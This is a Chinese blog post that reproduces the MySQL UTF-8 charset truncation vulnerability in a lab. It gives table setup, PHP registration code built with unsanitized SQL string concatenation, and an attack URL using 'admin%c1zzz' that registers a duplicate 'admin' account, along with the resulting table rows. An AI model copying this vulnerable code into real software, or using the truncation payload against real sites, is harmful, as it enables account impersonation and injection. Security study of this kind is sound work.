Mysql charset Truncation vulnerability

最新推荐文章于 2024-09-15 20:24:46 发布
最新推荐文章于 2024-09-15 20:24:46 发布
阅读量733 收藏
点赞数
分类专栏: web漏洞 文章标签: utf-8 mysql character
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011500307/article/details/31011155
版权

本文只是重现了下这个漏洞,详细请参考http://www.80sec.com/mysql-charset-truncation-vulnerability.html

1. 设置数据库的编码格式:

SET character_set_client = utf8;
SET character_set_connection = utf8;
SET character_set_database = utf8;
SET character_set_results = utf8;
SET character_set_server = utf8;
显示如下: 

mysql> show variables like 'character%';
+--------------------------+----------------------------+
| Variable_name            | Value                      |
+--------------------------+----------------------------+
| character_set_client     | utf8                       |
| character_set_connection | utf8                       |
| character_set_database   | utf8                       |
| character_set_filesystem | binary                     |
| character_set_results    | utf8                       |
| character_set_server     | utf8                       |
| character_set_system     | utf8                       |
| character_sets_dir       | /usr/share/mysql/charsets/ |
+--------------------------+----------------------------+
8 rows in set (0.00 sec)

2. 创建数据库与表: 

mysql> create database my_db;
Query OK, 1 row affected (0.00 sec)

mysql> use my_db;
Database changed
mysql> show tables;
Empty set (0.00 sec)

mysql>  create table test_user (username varchar(16), password varchar(20));
Query OK, 0 rows affected (0.00 sec)

mysql> insert into test_user values('admin','123445')
    -> ;
Query OK, 1 row affected (0.00 sec)

mysql> select * from test_user;
+----------+----------+
| username | password |
+----------+----------+
| admin    | 123445   |
+----------+----------+
1 row in set (0.00 sec)

3. 访问数据库的php代码如下: 
<?php
$user=$_REQUEST['user'];
$passwd=$_REQUEST['pass'];
mysql_connect("localhost", "root", "owaspbwa") or
die("Could not connect: " . mysql_error());
mysql_select_db("my_db");
mysql_query("SET names utf8");
$result = mysql_query("SELECT * from test_user where username='$user'");
if(trim($user)=='' or strlen($user)>16){
die("Input user Invalid");
}
if(@mysql_fetch_array($result, MYSQL_NUM)) {
die("already exist");
}
else {
$sql="insert test_user values ('$user','$passwd')";
mysql_query($sql);
echo "$user register OK!";
}
mysql_free_result($result);
?>

4. 如果if(trim($user)=='' or strlen($user)>16)不是大于16,比如大于20,则可以用SQL Column Truncation Vulnerabilities来写入一个与admin相同的用户,这里因为等于16所以行不通。不过可以通过utf-8多字节编码来截断插入一个admin用户。直接用http://192.168.182.149/test/sql.php?user=admin%c1zzz&pass=qweqweqwefdfdsf来访问,因为utf-8不包含0xc1所以后面的会截断。


数据库的内容:

mysql> select * from test_user;
+--------------+-----------------+
| username     | password        |
+--------------+-----------------+
| admin        | 123445          |
| admin0xc1zzz | qweqweqwefdfdsf |
| admin        | pass2           |
| admin0xc1fd  | pass2           |
| admin        | qweqweqwefdfdsf |
+--------------+-----------------+
5 rows in set (0.00 sec)




beyondkmp
关注
专栏目录
Image compression using modified block truncation coding
05-03
图像编码,this paper presents a modified block truncation coding(BTC) algorithm for image compression.Similar block in an image are mergrd intoa cluster and represented with the cluster center.
multiline-truncation
07-06
1. **引入库**:你可以通过下载 `multiline-truncation-master` 压缩包,将其中的 JavaScript 文件(通常是 `multiline-truncation.js` 或 `multiline-truncation.min.js`)添加到你的 HTML 文档中,或者通过 CDN ...
block truncation image compression.rar_block truncation_image co
07-13
《图像压缩技术:块截断编码(Block Truncation Coding, BTC)详解》 在数字图像处理领域,图像压缩是一项至关重要的技术,它能够减少存储空间需求和提高数据传输效率。其中,块截断编码(Block Truncation Coding,...
Mysql中文乱码问题完美解决方案.docx
09-14
- `com.mysql.jdbc.MysqlDataTruncation: Data truncation: Data too long for column`错误通常是由于字段长度不足或字符集不匹配造成的,调整字段长度或字符集设置可解决。 综上所述,解决MySQL中文乱码问题通常...
MySql超长自动截断实例详解
09-09
5. **捕获和处理异常**:在代码中捕获并处理`Data truncation`异常,根据业务需求决定是抛出错误、截断数据还是提示用户。 了解这些机制后,你可以根据项目需求选择合适的方式来处理MySQL的自动截断行为,以确保...
php LFI漏洞的一些收集
u011500307的专栏
06-08 3273
1. LFI全称是local file include,先举个最简单的例子来说明下:
Length Extension Attack
u011500307的专栏
04-19 2875
在做plaidctf时遇到了这个,记录下吧。
burpsuit暴力破解webgoat的用户验证
u011500307的专栏
05-23 1906
1. 在用owaspbwa这个系统的时候,当你要登录
SQL Column Truncation Vulnerabilities
u011500307的专栏
04-25 858
mysql数据插入的时候,如果插入的长度超过了
MySQL】表的操作【有关表结构的操作】【创建、查看、删除、修改表结构】
aaa114514aaaa的博客
09-12 1140
对于mysql数据库的表的结构的查看,创建、删除、修改、【对字段的添加、修改】
mysql组合键唯一
qq_36321899的博客
09-11 384
这些方法可以帮助您在MySQL数据库中设置多个字段的组合唯一性,确保数据的完整性和准确性。如果您在操作过程中遇到任何问题,可以参考相关的MySQL文档或搜索相应的解决方案。请注意,在添加组合唯一键之前,确保表中的数据已经满足唯一性约束,否则操作将会失败。如果表中已经存在重复的组合数据,您需要先清理这些数据,然后才能成功添加唯一键。在MySQL中,如果您想要确保两个或多个列的组合数据是唯一的,您可以使用组合唯一键(也称为复合唯一键或联合唯一索引)。表添加一个组合唯一键,以确保。例如,如果您有一个名为。
基于SpringBoot+Vue+MySQL的教学资源共享平台
程序员大金的博客
09-11 963
基于SpringBoot+Vue+MySQL的教学资源共享平台,附源码。
基于SpringBoot+Vue+MySQL的瑜伽馆管理系统
程序员大金的博客
09-11 1289
基于SpringBoot+Vue+MySQL的瑜伽馆管理系统,附源码。
MySQL练手题--体育馆的人流量(困难)
最新发布
weixin_66919047的博客
09-15 487
此题稍微微有一点难度,如果看不明白可以对题目进行分解分析,分析出一步之后再接下一步来查询,题目已经要求人数大于等于100且id连续三行,就可以先筛选出大于等于100 的id 然后排序求差 差值相等的均为id连续的 ,最后筛选差值总数大于等于3 的,便出来了最后结果;
Navicat On-Prem Server 2.0 | MySQL与MariaDB基础管理功能正式上云
Navicat 官方账号
09-11 1212
近日,Navicat 发布了 Navicat On-Prem Server 2.0 的重大版本更新。这标志着这款自2021年首发的私有云团队协作解决方案迈入了一个崭新的阶段。此次2.0版本的飞跃性升级,核心聚焦于MySQL与MariaDB基础管理功能的全面革新与强化,赋予了用户的操作灵活性与高效性,进一步助力团队在私有云环境下实现无缝协同作业。
基于SpringBoot+Vue+MySQL的网上甜品蛋糕售卖店管理系统
程序员大金的博客
09-12 715
基于SpringBoot+Vue+MySQL的网上甜品蛋糕售卖店管理系统,附源码。
MYSQL数据库基础篇——MYSQL的安装与使用
qq_74177011的博客
09-11 398
mysql -u表示用于登录的用户名,后面的root就是用户名称,之前讲到,安装mYSQL时默认用户名是root,-p表示指定密码,即登录密码。首先打开命令提升符,并输入net start mysql80可以启动,输入net stop mysql80可以停止。这里选择第一个,当然,有可能你的版本下的MYSQL并没有这个选项,那么我们可以选择。注意:如果报以下错误,则可以尝试通过管理员的方式打开命令提示符进行操作。输入mysql -u root -p,然后输入密码就好了。然后显示下面的界面说明连接成功了;
55 mysql 的登录认证流程
970655147的专栏
09-15 811
这里我们来看一下 mysql 的认证的流程我们这里仅仅看 我们最常见的一个 认证的处理流程我们经常会登录的时候 碰到各种异常信息大概的流程是这样客户端和服务器建立连接之后, 服务器向客户端发送 salt然后 客户端根据 salt 将客户端传入的密码加密之后, 以及相关登录信息传递给服务器然后 服务器进行验证, 验证失败, 响应对应的错误信息给客户端服务器发送 salt 的信息如下客户端发送的认证请求如下服务器响应的认证失败信息如下。
pointer truncation
06-28
### 回答1: 指针截断(pointer truncation)是指将一个指针从一个数据类型转换为另一个数据类型时,导致指针所指向的内存地址被截断的现象。这种情况可能会导致程序出现错误或崩溃,因为截断后的指针可能无法正确访问原来指向的内存地址。在编程中,应该避免出现指针截断的情况,确保指针类型转换的正确性。 ### 回答2: Pointer truncation 是指当某个指针变量被转换为一个较小的类型时,因为指针变量存储的地址值超过了目标类型所能表达的最大值而发生的截断现象。 在 C 和 C++ 语言中,指针变量的大小是与所指向的内存地址的大小相关的。对于一个 32 位的系统,一个指针变量占用 4 个字节的内存空间,能够表示的内存地址范围为 0 ~ 2^32-1 。而当一个指针被转换为一个较小的类型,例如 char 或 short 时,实际上只有一个字节或两个字节的空间被分配给这个新的类型。如果原来指针变量的地址值超过了新类型的最大值,那么转换后的指针将出现截断,导致指针指向错误的地址。这种行为被称为 pointer truncation。 在程序开发中,可能会出现 pointer truncation 的情况。这种情况可能会导致程序崩溃、数据丢失或不可预测的行为。因此,在编写程序时,必须防止 pointer truncation 的发生。 为了避免 pointer truncation,程序员应该注意以下几点: 1. 不要将大类型的指针转换为小类型的指针。 2. 在使用某些 C 标准库函数时要特别小心,这些函数可能会强制转换指针类型并导致指针截断。 3. 确保所使用的编译器和操作系统支持指针足够的大小,以避免指针截断的问题。 4. 当使用较小类型的指针时,确保只使用能够表示的内存地址范围,以避免指针截断。 总之,pointer truncation 是由于指针变量存储的地址值超过了目标类型所能表达的最大值而发生的截断现象。程序员应该注意在程序中避免这种现象的发生,以确保程序的正确性和可靠性。 ### 回答3: 指针截断是指将一个指向较大数据类型的指针赋值给一个指向较小数据类型的指针,从而导致指针的位数被截断的情况。这种情况通常发生在编写系统编程时,在对数据类型进行强制类型转换或在将指针在不同的数据类型之间进行转换时。 指针截断的主要问题是当位数被截断时,指针就会丢失某些信息。当一个指针被截断时,它指向的内存地址可能会改变,因此可能会影响程序的运行。另外,指针截断可能会导致程序出现未定义的行为,这意味着程序的行为将无法预测,通常接下来的操作都是不安全的。 为了避免指针截断的问题,我们可以使用一些技巧来解决。例如,使用类型转换来将较大的数据类型转换为较小的数据类型,在将指针转换到另一个类型时,我们可以使用某些特定的技巧来确保指针不会被截断。例如,我们可以使用两个指针,其中一个指向数据的源,并将其强制转换为较小的数据类型,而另一个指向此数据类型的指针,则指向转换后的新数据。当我们对源指针进行任何操作时,新的指针也会使它进行相应的操作。 总的来说,指针截断是一个很具有挑战性的问题,但如果我们始终注意到它的问题,并使用合适的技巧进行调整,就可以避免指针截断上出现的错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值